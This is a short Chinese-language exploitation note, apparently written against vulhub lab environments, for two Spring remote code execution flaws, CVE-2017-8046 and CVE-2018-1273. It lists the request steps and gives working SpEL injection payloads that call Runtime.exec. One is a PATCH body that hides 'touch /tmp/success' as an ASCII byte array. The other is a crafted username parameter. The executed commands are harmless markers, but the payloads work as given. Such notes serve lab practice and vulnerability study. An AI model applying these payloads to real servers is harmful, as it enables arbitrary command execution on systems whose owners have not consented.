Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
环境搭建
漏洞利用
1. 访问 http://your-ip:8080/customers/1
2.然后抓取数据包,使⽤PATCH请求来修改
[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }]
其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
查看是否上传成功
spring 代码执⾏ (CVE-2018-1273)
搭建环境后访问
访问users
填写注册信息,抓包
在username后加
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")]=&password=&repeatedPassword=
进入终端查看
